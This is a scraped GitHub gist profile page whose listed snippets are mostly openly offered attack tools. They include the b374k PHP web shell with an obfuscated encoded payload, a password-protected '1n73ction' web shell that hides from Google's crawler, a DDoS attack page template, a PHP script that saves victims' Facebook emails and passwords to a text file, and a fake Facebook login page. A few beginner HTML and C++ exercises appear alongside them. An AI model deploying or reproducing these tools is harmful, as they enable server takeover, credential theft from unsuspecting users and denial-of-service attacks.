Skip to content

Instantly share code, notes, and snippets.

View fakhrikmt's full-sized avatar

Fakhri Kmt fakhrikmt

View GitHub Profile
@fakhrikmt
fakhrikmt / B374K.php
Created August 16, 2017 07:07
Shell B374K
<?php
@error_reporting(0);
@set_time_limit(0);
$code = "7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770
t7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC
ZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl
iTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS
@fakhrikmt
fakhrikmt / 1n73tion.php
Created August 16, 2017 07:05
Shell 1n73tion
<?php
/* (Web Shell b374k r3c0d3d by x'1n73ct|default pass:" 1n73ction ") */
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
@fakhrikmt
fakhrikmt / Format HTML.html
Created August 16, 2017 00:58
pengertian dari HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Judul HTML</title>
</head>
<body>
<p>Ini adalah paragraf</p>
</body>
</html>
@fakhrikmt
fakhrikmt / script ddos r00t smile.xml
Created August 11, 2017 21:34
Template DDOS R00T Smile
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<meta charset='UTF-8'/>
<meta content='~/R0sX_010' name='author'/>
<meta content='~/R00T Smile DDOS Attack' name='description'/>
<meta content='ddos, ddos online, ddos attack, online ddos, attack' name='keywords'/>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
@fakhrikmt
fakhrikmt / logs.php
Last active August 4, 2017 10:07
Script Save Inputan FB
<?php
header ("Location: http://m.facebook.com");
$ADEx = "kontak.txt";
$ADEy = $_POST['email'];
$ADEz = $_POST['pass'];
$handle = fopen($ADEx, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email atau Telepon : ");
@fakhrikmt
fakhrikmt / loginfb.html
Created August 4, 2017 09:09
Fake Login FB
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Masuk Facebook | Facebook</title><meta name="referrer" content="default" id="meta_referrer" /><style type="text/css">/*<![CDATA[*/.b .bn{border:solid 1px #999;-moz-box-sizing:border-box;width:100%;}.b .bx{display:block;width:auto;}.b .bx a.by,.b .bx a.by:hover{background-color:#69a74e;color:#fff;height:44px;}.b .bt{display:block;margin-bottom:5px;margin-left:3%;margin-top:-3px;overflow:hidden;text-align:center;white-space:nowrap;width:94%;}.b .bt>span{display:inline-block;position:relative;}.b .bt>span:before,.b .bt>span:after{background:#ced0d4;content:"";height:1px;position:absolute;top:50%;width:9999px;}.b .bt>span:before{margin-right:15px;right:100%;}.b .bt>span:after{left:100%;margin-left:15px;}.b .bu{color:#4b4f56;font-size:14px;}.y{padding:8px;}.cb{padding-bottom:12px;padding-top:12px;}.ca{padding-le
@fakhrikmt
fakhrikmt / Program Matriks Lengkap.cpp
Last active June 3, 2017 21:29
Program matriks lengkap
#include <iostream.h>
#include <conio.h>
#include <stdio.h>
using namespace std;
int main(){
int K['r']['s'],L['r']['s'],M['r']['s'],N['r']['s'],O['r']['s'],T['r']['s'],X['r']['s'];
int pilih,max,min;
int a,b,x,r,s;
system("CLS");
welcome:
@fakhrikmt
fakhrikmt / array 2 dimensi.cpp
Last active May 11, 2017 07:14
Belajar C++ Array 2 Dimensi
#include <iostream.h>
#include <conio.h>
#include <stdlib.h>
#include <iomanip.h>
int main(void)
{
int matrix[10][10];
int tampung[10];
randomize();